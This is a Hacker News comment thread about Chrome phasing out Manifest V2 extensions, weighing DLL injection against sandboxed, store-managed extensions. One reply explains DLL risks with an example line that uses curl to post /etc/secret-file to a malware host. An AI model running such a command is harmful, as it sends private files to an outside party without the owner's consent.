←back to thread

"Begin disabling installed extensions still using Manifest V2 in Chrome stable"

(developer.chrome.com)
552 points freedomben | 4 comments | 11 Oct 24 14:20 UTC | HN request time: 0.751s | source
Show context
est ◴[11 Oct 24 14:36 UTC] No.41809848[source]
Can't we avoid the Manifest bullshit altogether?

I remember how IE plugins roles: just dll inject into the process.

replies(4): >>41809886 #>>41810032 #>>41814087 #>>41825057 #
emestifs ◴[11 Oct 24 14:40 UTC] No.41809886[source]
Inject dll's from the internet right into the browser. Yes, let's!
replies(1): >>41810215 #
yjftsjthsd-h ◴[11 Oct 24 15:14 UTC] No.41810215[source]
I'm not convinced that this is a good idea, but I don't think that's the reason; don't all your dlls come from the internet?
replies(2): >>41810341 #>>41816218 #
1. emestifs ◴[11 Oct 24 15:26 UTC] No.41810341[source]
My comment was sarcasm.

The difference here is are you downloading a random dll from a well known source or from http://free-vpn-fast-internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't going to know the difference and will click the big green DOWNLOAD NOW button blindly.

replies(2): >>41810726 #>>41816205 #
2. yjftsjthsd-h ◴[11 Oct 24 16:06 UTC] No.41810726[source]
But that's not a difference, is it? Can't Windows enforce that DLLs have to be signed just like extensions?
replies(1): >>41812632 #
3. tredre3 ◴[11 Oct 24 19:21 UTC] No.41812632[source]
Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.

A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.

Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.

So it's best to limit what the extension can do to begin with.

4. est ◴[12 Oct 24 03:39 UTC] No.41816205[source]
My heavily downvoted comment was also a sarcasm.

So here's the dilemma:

- People are afraid of plugins "in the wild". People need some kind of centralized, managed "extension store"

- People complains about store policy like Manifest V3

I don't think a single mechanism can please both crowds.

And what's worse? Google doesn't actually care about the security of the the "store". Scam extensions are everywhere. The "audit process" are minimal, customer/developer service are essentially none, and Google only enforce rules that affect their ads business.